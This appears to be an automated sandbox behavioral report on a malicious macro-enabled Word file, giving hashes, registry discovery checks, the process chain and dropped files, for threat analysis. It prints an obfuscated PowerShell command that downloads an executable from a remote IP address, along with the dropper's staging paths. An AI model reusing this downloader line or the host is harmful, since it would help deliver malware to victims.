Behavioral Report

General

Target

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
Size

89KB
MD5

b52f6306e6c5af7bd87fab6f32a937b9
SHA1

e7043e9907b332b9039eeb4487959d10e05d2dc0
SHA256

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4
SHA512

0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Score

10^/10

Malware Config

Extracted

Language	ps1
Deobfuscated
URLs	http://62.108.35.164/api.php exe.dropper http://62.108.35.164/api.php

Signatures

Process spawned unexpected child process ⋅ 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

explorer.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4004	3488	explorer.exe	WINWORD.EXE

Blocklisted process makes network request ⋅ 1 IoCs

Processes:

powershell.exe

flow pid process

48 3596 powershell.exe

flow	pid	process
48	3596	powershell.exe

Checks computer location settings ⋅ 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

TTPs:

Query Registry System Information Discovery

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery

Checks processor information in registry ⋅ 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe ⋅ 1 IoCs
evasion

Processes:

timeout.exe

pid process

1652 timeout.exe

pid	process
1652	timeout.exe

Enumerates system info in registry ⋅ 2 TTPs 3 IoCs

TTPs:

Query Registry System Information Discovery

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies registry class ⋅ 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings explorer.exe
Suspicious behavior: AddClipboardFormatListener ⋅ 2 IoCs

Processes:

WINWORD.EXE

pid process

3488 WINWORD.EXE
3488 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses ⋅ 2 IoCs

Processes:

powershell.exe

pid process

3596 powershell.exe
3596 powershell.exe
Suspicious use of AdjustPrivilegeToken ⋅ 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3596 powershell.exe
Suspicious use of SetWindowsHookEx ⋅ 4 IoCs

Processes:

WINWORD.EXE

pid process

3488 WINWORD.EXE
3488 WINWORD.EXE
3488 WINWORD.EXE
3488 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	explorer.exe

pid	process
3488	WINWORD.EXE
3488	WINWORD.EXE

pid	process
3596	powershell.exe
3596	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3596	powershell.exe

pid	process
3488	WINWORD.EXE
3488	WINWORD.EXE
3488	WINWORD.EXE
3488	WINWORD.EXE

Suspicious use of WriteProcessMemory ⋅ 10 IoCs

Processes:

WINWORD.EXEexplorer.exeWScript.execmd.exe

description	pid	process	target process
PID 3488 wrote to memory of 4004	3488	WINWORD.EXE	explorer.exe
PID 3488 wrote to memory of 4004	3488	WINWORD.EXE	explorer.exe
PID 100 wrote to memory of 3796	100	explorer.exe	WScript.exe
PID 100 wrote to memory of 3796	100	explorer.exe	WScript.exe
PID 3796 wrote to memory of 760	3796	WScript.exe	cmd.exe
PID 3796 wrote to memory of 760	3796	WScript.exe	cmd.exe
PID 760 wrote to memory of 3596	760	cmd.exe	powershell.exe
PID 760 wrote to memory of 3596	760	cmd.exe	powershell.exe
PID 760 wrote to memory of 1652	760	cmd.exe	timeout.exe
PID 760 wrote to memory of 1652	760	cmd.exe	timeout.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""

Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:3488

C:\Windows\explorer.exe

explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs

Process spawned unexpected child process

PID:4004

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

Modifies registry class
Suspicious use of WriteProcessMemory

PID:100

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"

Checks computer location settings
Suspicious use of WriteProcessMemory

PID:3796

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "

Suspicious use of WriteProcessMemory

PID:760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')

Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:3596

C:\Windows\system32\timeout.exe

TIMEOUT /T 10

Delays execution with timeout.exe

PID:1652

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
MD5
197fd11428deaf8779c40b8aee37c023

SHA1
66d053c6349a994301ba6ec562c7e659f6e60e40

SHA256
7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8

SHA512
ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4

Download Submit
C:\ProgramData\OIUTFuy
MD5
12a0751c89b3b618b7c91cee7a231878

SHA1
2d546c942a6626826dc1d76d752cb6bb67546a94

SHA256
c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc

SHA512
aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3

Download Submit
C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
MD5
d940788959fad6d9ec52674997f04457

SHA1
c784384517d2c206c5423a8d58dee5d9ca9c6ffb

SHA256
46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646

SHA512
802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430

Download Submit
memory/760-146-0x0000000000000000-mapping.dmp

Download
memory/1652-151-0x0000000000000000-mapping.dmp

Download
memory/3488-135-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

Download
memory/3488-136-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

Download
memory/3488-137-0x000001609A390000-0x000001609A394000-memory.dmp

Download
memory/3488-131-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-130-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-132-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-142-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-143-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-144-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-145-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-134-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-133-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3596-149-0x0000025977970000-0x0000025977992000-memory.dmp

Download
memory/3596-148-0x0000000000000000-mapping.dmp

Download
memory/3596-150-0x00007FF847690000-0x00007FF848151000-memory.dmp

Download
memory/3796-140-0x0000000000000000-mapping.dmp

Download
memory/4004-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Downloads